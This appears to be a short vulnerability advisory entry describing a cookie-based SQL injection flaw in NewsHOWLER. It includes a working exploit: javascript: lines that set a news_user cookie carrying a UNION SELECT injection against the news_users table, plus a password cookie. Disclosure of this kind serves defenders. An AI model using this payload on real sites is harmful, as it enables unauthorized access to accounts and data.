• info
• discussion
• exploit
• solution
• references

NewsHOWLER Cookie Data SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following exploit is available:

javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
javascript:document.cookie = "news_password=3; path=/";